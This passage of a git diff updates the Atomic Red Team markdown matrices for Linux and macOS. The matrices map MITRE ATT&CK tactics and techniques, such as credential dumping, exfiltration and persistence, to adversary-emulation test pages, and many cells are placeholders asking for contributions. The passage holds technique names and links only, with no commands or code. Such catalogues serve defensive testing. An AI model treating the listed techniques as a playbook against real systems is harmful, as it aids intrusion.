Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | | | | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | @@ -61,13 +71,16 @@ | | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | | | | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | | +| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index f82dd981..952efc86 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -1,32 +1,32 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache 